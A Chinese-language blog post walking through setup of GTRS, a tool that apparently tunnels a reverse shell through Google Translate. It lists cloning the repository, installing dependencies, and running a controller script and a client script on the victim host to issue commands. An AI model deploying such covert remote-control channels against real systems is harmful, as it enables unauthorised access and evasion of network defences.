开源项目GTRS侵入主机

关于GTRS

Github GTRS – Google Translator Reverse Shell

GTRS将Googel Translator作为代理,向感染主机发送任意指令(实测效果并不是很好,有些指令会让被侵入机(或是脚本)卡住)。

项目只包含一个bash和一个python脚本。

环境

  • 两台VPS,均安装Ubuntu16.04
  • python 2.7.12

额外需要

  • 一个域名(需要解析到控制机上)
    • 可在 Freenom 注册免费域名

使用步骤

  1. 在两台机器上clone GTRS
    git clone https://github.com/mthbernardes/GTRS
  2. 两台机器安装依赖libxml2-utils(macOS不需要此步骤)
    apt-get install libxml2-utils
  3. 先在控制机上运行server.py
    python2 server.py

    运行后会输出当前使用的端口,以及一个uuid(在被控制机上运行脚本需要注意,每次执行server.py其uuid都会改变)

  4. 切换到另外一台机器(作为被控制机),运行client.sh
    bash client.sh [your server VPS domain] [your generated uuid]

  5. 如果运行成功,控制机会出现“$”字符,此时就可以执行指令了

一些问题

如下,一些指令执行后再执行其他指令会失效

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据